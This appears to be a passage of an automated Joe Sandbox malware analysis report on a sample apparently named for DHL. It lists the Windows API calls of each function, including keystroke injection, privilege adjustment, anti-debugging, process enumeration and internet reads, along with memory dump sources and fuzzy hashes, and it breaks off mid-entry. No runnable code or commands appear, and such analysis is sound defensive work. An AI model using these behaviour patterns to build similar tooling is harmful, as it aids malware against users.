                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                        • API String ID: 0-1546025612
                                                        • Opcode ID: dbcc6a2a295c7cdfa71b8c08855c8e5d7ed0ebc2f5eebefc7007427ffed2ca09
                                                        • Instruction ID: c66a190d6646d906982b14b7623c9a2c97bd127dbd91a04f4d5ed317fcf90783
                                                        • Opcode Fuzzy Hash: dbcc6a2a295c7cdfa71b8c08855c8e5d7ed0ebc2f5eebefc7007427ffed2ca09
                                                        • Instruction Fuzzy Hash: EDA2CE70E0025ACBDF25CF59C8407AEB7B5FF55314F2585AAE816AB281EB349D81CF90
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00A2A6AC
                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00A2A6BA
                                                          • Part of subcall function 009A9CB3: _wcslen.LIBCMT ref: 009A9CBD
                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00A2A79C
                                                        • CloseHandle.KERNEL32(00000000), ref: 00A2A7AB
                                                          • Part of subcall function 009BCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,009E3303,?), ref: 009BCE8A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                        • String ID:
                                                        • API String ID: 1991900642-0
                                                        • Opcode ID: 7040f2b8a854eae8710b0fb78ced25b74970362d13b07655048872d4613fcb80
                                                        • Instruction ID: 984adfd68e1207903e9b1e6ef50874ac1b64f5d51d5446f2b5d347689e0c83a6
                                                        • Opcode Fuzzy Hash: 7040f2b8a854eae8710b0fb78ced25b74970362d13b07655048872d4613fcb80
                                                        • Instruction Fuzzy Hash: F1514EB15083109FD710EF28D886A6BBBE8FFC9754F00892DF59997251EB30D905CB92
                                                        APIs
                                                        • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00A0AAAC
                                                        • SetKeyboardState.USER32(00000080), ref: 00A0AAC8
                                                        • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00A0AB36
                                                        • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00A0AB88
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: KeyboardState$InputMessagePostSend
                                                        • String ID:
                                                        • API String ID: 432972143-0
                                                        • Opcode ID: 966ce58603ba5164ff5e299ce7842ef0464d18c7e96875cb2adfc651ab9565ae
                                                        • Instruction ID: e59b39205540de2a4617ed65622e397f60c08be6b9f0d392f81928ecf1214bca
                                                        • Opcode Fuzzy Hash: 966ce58603ba5164ff5e299ce7842ef0464d18c7e96875cb2adfc651ab9565ae
                                                        • Instruction Fuzzy Hash: AD311431A4030CAEFB35CB68EC05BFA7BA6EB66320F04421AF085961D1D374CD81C762
                                                        APIs
                                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 00A1CE89
                                                        • GetLastError.KERNEL32(?,00000000), ref: 00A1CEEA
                                                        • SetEvent.KERNEL32(?,?,00000000), ref: 00A1CEFE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ErrorEventFileInternetLastRead
                                                        • String ID:
                                                        • API String ID: 234945975-0
                                                        • Opcode ID: 11781dca09948a823baa1dbb739bdc8746be2030f94186cf8abde66b16dc37a8
                                                        • Instruction ID: 6a614ed4269371a947a94d580419798845d149872f8a01e0c413ceddeb3a47c1
                                                        • Opcode Fuzzy Hash: 11781dca09948a823baa1dbb739bdc8746be2030f94186cf8abde66b16dc37a8
                                                        • Instruction Fuzzy Hash: 2121BAB1940305ABEB20DFA5CD48BA7B7F8EB40364F10442EE546A2191E774EE858BA4
                                                        APIs
                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00A082AA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: lstrlen
                                                        • String ID: ($|
                                                        • API String ID: 1659193697-1631851259
                                                        • Opcode ID: 8abfb721bce9b8e4223eb2f5cc9722bedbd2678e1b1446416595f083b05f5edc
                                                        • Instruction ID: 3e381d33d1fa40295c340a064c8a7fa32d4c469cdcf6ca318a6b6d8f9a4d97e1
                                                        • Opcode Fuzzy Hash: 8abfb721bce9b8e4223eb2f5cc9722bedbd2678e1b1446416595f083b05f5edc
                                                        • Instruction Fuzzy Hash: B1323675A007059FCB28CF29D481AAAB7F0FF48710B15C56EE49ADB3A1EB74E941CB44
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00A15CC1
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00A15D17
                                                        • FindClose.KERNEL32(?), ref: 00A15D5F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNext
                                                        • String ID:
                                                        • API String ID: 3541575487-0
                                                        • Opcode ID: f8ebd250fd954b31c22ca7c405173a9e6f96bd98b6db4dbf74670fb78eb5d6e9
                                                        • Instruction ID: d97af6cbbe38e2781ceb2a02ec6bf43ab031b6436c275ea4d8ceb75f3215ec98
                                                        • Opcode Fuzzy Hash: f8ebd250fd954b31c22ca7c405173a9e6f96bd98b6db4dbf74670fb78eb5d6e9
                                                        • Instruction Fuzzy Hash: CB51AA74A04A01DFC714DF28D894E96B7E4FF8A324F14855DE95A8B3A1DB30EC44CB91
                                                        APIs
                                                        • IsDebuggerPresent.KERNEL32 ref: 009D271A
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009D2724
                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 009D2731
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                        • String ID:
                                                        • API String ID: 3906539128-0
                                                        • Opcode ID: 7c4022414215571501e1be5ed9dfc06021201108777eb1a101290d18135197a2
                                                        • Instruction ID: 053b98b6c3f70eb9fde3ceabf805967b5cd1dede840f8d070476b0886706e2ef
                                                        • Opcode Fuzzy Hash: 7c4022414215571501e1be5ed9dfc06021201108777eb1a101290d18135197a2
                                                        • Instruction Fuzzy Hash: 5131F57094121CABCB21DF64DC88BDCBBB8AF48310F5041EAE81CA7261E7349F818F45
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 00A151DA
                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00A15238
                                                        • SetErrorMode.KERNEL32(00000000), ref: 00A152A1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$DiskFreeSpace
                                                        • String ID:
                                                        • API String ID: 1682464887-0
                                                        • Opcode ID: 784c40b96facff827d5ae398d4ba9394c753600ee79c8fb0b3d3626f4bab7b0d
                                                        • Instruction ID: efa15d4c4194ad83e83e8cc00757dacb923848c9174bbdeee11a1d41ca0c33dd
                                                        • Opcode Fuzzy Hash: 784c40b96facff827d5ae398d4ba9394c753600ee79c8fb0b3d3626f4bab7b0d
                                                        • Instruction Fuzzy Hash: AE312975A00518DFDB00DFA4D884EEDBBB5FF49314F088099E805AB3A2DB35E856CB90
                                                        APIs
                                                          • Part of subcall function 009BFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 009C0668
                                                          • Part of subcall function 009BFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 009C0685
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A0170D
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A0173A
                                                        • GetLastError.KERNEL32 ref: 00A0174A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                        • String ID:
                                                        • API String ID: 577356006-0
                                                        • Opcode ID: 519e56fc51d50ab0a87fcccd0f19ec0b24b9efef204486e44475c5efc80f2edf
                                                        • Instruction ID: 990d4f4beb90e4dcacf52938e545757f1495fb88ce175dbfcca614e3f64ed1dd
                                                        • Opcode Fuzzy Hash: 519e56fc51d50ab0a87fcccd0f19ec0b24b9efef204486e44475c5efc80f2edf
                                                        • Instruction Fuzzy Hash: 471191B2504308AFD718DF54ED86EAAB7B9EB44724B20852EF05657681EB70FC418B60
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00A0D608
                                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00A0D645
                                                        • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00A0D650
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: CloseControlCreateDeviceFileHandle
                                                        • String ID:
                                                        • API String ID: 33631002-0
                                                        • Opcode ID: 1aba454cb4b8a5bb6b898a03a20a452fc2e5264069d1ac5abf16dedede7f283b
                                                        • Instruction ID: 0ad8b11741520c3af70d218f9b26003ba8276a8d2536c799b3e51333396f6d3b
                                                        • Opcode Fuzzy Hash: 1aba454cb4b8a5bb6b898a03a20a452fc2e5264069d1ac5abf16dedede7f283b
                                                        • Instruction Fuzzy Hash: 8E113C76E05228BBDB108FD5AC45FAFBBBCEB45B60F108115F904E7290D6704A058BA1
                                                        APIs
                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00A0168C
                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00A016A1
                                                        • FreeSid.ADVAPI32(?), ref: 00A016B1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                        • String ID:
                                                        • API String ID: 3429775523-0
                                                        • Opcode ID: 68b9d3083409c0f96ad7e02c7af9bd78994d7fd9aed22485748d66640c5499c4
                                                        • Instruction ID: 3b8a1a6e53f1950157a4a730411488f7b80b1ac89f9f9263c7891368192bc28d
                                                        • Opcode Fuzzy Hash: 68b9d3083409c0f96ad7e02c7af9bd78994d7fd9aed22485748d66640c5499c4
                                                        • Instruction Fuzzy Hash: CEF0F47195030DFBDB00DFE49D89AAEBBBCEB08714F504565E501E2181E774AA448B50
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(009D28E9,?,009C4CBE,009D28E9,00A688B8,0000000C,009C4E15,009D28E9,00000002,00000000,?,009D28E9), ref: 009C4D09
                                                        • TerminateProcess.KERNEL32(00000000,?,009C4CBE,009D28E9,00A688B8,0000000C,009C4E15,009D28E9,00000002,00000000,?,009D28E9), ref: 009C4D10
                                                        • ExitProcess.KERNEL32 ref: 009C4D22
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Process$CurrentExitTerminate
                                                        • String ID:
                                                        • API String ID: 1703294689-0
                                                        • Opcode ID: f6563768f49ea9d41b7744f1edd115b52c05a6bb726b38d86f8699a3fc148c61
                                                        • Instruction ID: d7571cdfb447ad270d7a7c2855d904c8b2de453bb3480310984f80a65afa4c59
                                                        • Opcode Fuzzy Hash: f6563768f49ea9d41b7744f1edd115b52c05a6bb726b38d86f8699a3fc148c61
                                                        • Instruction Fuzzy Hash: CDE0B631500148ABCF11BFA4DE1AF987B69EB817A1B108418FC0A9A262CB35ED52DB81
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: /
                                                        • API String ID: 0-2043925204
                                                        • Opcode ID: eed068ecbb50cac4d38398a264687e5ddbd28b322b8374dbde464d2ebf0911bf
                                                        • Instruction ID: d2cefb33bf8a149d50b1905a2b2fe743c6e0e171b3412c01a3b49815a2f95822
                                                        • Opcode Fuzzy Hash: eed068ecbb50cac4d38398a264687e5ddbd28b322b8374dbde464d2ebf0911bf
                                                        • Instruction Fuzzy Hash: 7E4128B694021A6BCB249FB9CC49EBBB77CEB84354F10826AF915D7280E6709D41CB50
                                                        APIs
                                                        • GetUserNameW.ADVAPI32(?,?), ref: 009FD28C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: NameUser
                                                        • String ID: X64
                                                        • API String ID: 2645101109-893830106
                                                        • Opcode ID: f5f988d883b73c5ec084b926cb5cb27cdcfaffbe87b366c894d1ef029e257814
                                                        • Instruction ID: 302d3e8bce339a8cbda9b54a651f02c781d17a174ee9a53e26a104e0c8bfea9e
                                                        • Opcode Fuzzy Hash: f5f988d883b73c5ec084b926cb5cb27cdcfaffbe87b366c894d1ef029e257814
                                                        • Instruction Fuzzy Hash: C6D0C9B480212DEACB94DB90DC88DD9B37CBB04325F100551F106B2000D73495498F10
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                        • Instruction ID: b5c6f6186e097b494e0b00dd9ad242803e1a173a276c891d0f0e06b5d3461562
                                                        • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                        • Instruction Fuzzy Hash: 66021CB1E002199BDF14CFA9C880BADBBF5EF88314F25456DD819E7380D731AE418B95
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00A16918
                                                        • FindClose.KERNEL32(00000000), ref: 00A16961
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID:
                                                        • API String ID: 2295610775-0
                                                        • Opcode ID: 50708f3753a27822670c245836b646e6ce359edf63f810050cc36c8c22c54e22
                                                        • Instruction ID: d08acd712b0336f343776fc7c97d800d7a300b234da2eda47431e3c5db0e02f5
                                                        • Opcode Fuzzy Hash: 50708f3753a27822670c245836b646e6ce359edf63f810050cc36c8c22c54e22
                                                        • Instruction Fuzzy Hash: 88118E716042109FC710DF69D885A56BBE5EF85328F14C699F8698F2A2C730EC45CBD1
                                                        APIs
                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00A24891,?,?,00000035,?), ref: 00A137E4
                                                        • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00A24891,?,?,00000035,?), ref: 00A137F4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ErrorFormatLastMessage
                                                        • String ID:
                                                        • API String ID: 3479602957-0
                                                        • Opcode ID: 5a17ce0b1a8a77a2d0feee93f20660c310845e93de6f84c4a49cf08758c2213b
                                                        • Instruction ID: d079a6a7022c7dd074ca72070626d4aa4ccb84960dbe4a5e99a9529657562cf3
                                                        • Opcode Fuzzy Hash: 5a17ce0b1a8a77a2d0feee93f20660c310845e93de6f84c4a49cf08758c2213b
                                                        • Instruction Fuzzy Hash: D1F0E5B16043282AEB20A7A68C4DFEB7AAEEFC5771F000175F509E22C1DA609D44C7F0
                                                        APIs
                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00A0B25D
                                                        • keybd_event.USER32(?,76C1C0D0,?,00000000), ref: 00A0B270
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: InputSendkeybd_event
                                                        • String ID:
                                                        • API String ID: 3536248340-0
                                                        • Opcode ID: 4e114266e5ad10ae8a5ba954ad567174babcefd9822eef2c1d6255754a07fd50
                                                        • Instruction ID: df3761734c60ba6a9177c7de0c5a948f39ad9a08912d71d35d39ea1f1bf57f95
                                                        • Opcode Fuzzy Hash: 4e114266e5ad10ae8a5ba954ad567174babcefd9822eef2c1d6255754a07fd50
                                                        • Instruction Fuzzy Hash: A9F01D7185424DABDB05DFA0DC05BEE7BB4FF08315F00800AF955A5191C37986119FA4
                                                        APIs
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A011FC), ref: 00A010D4
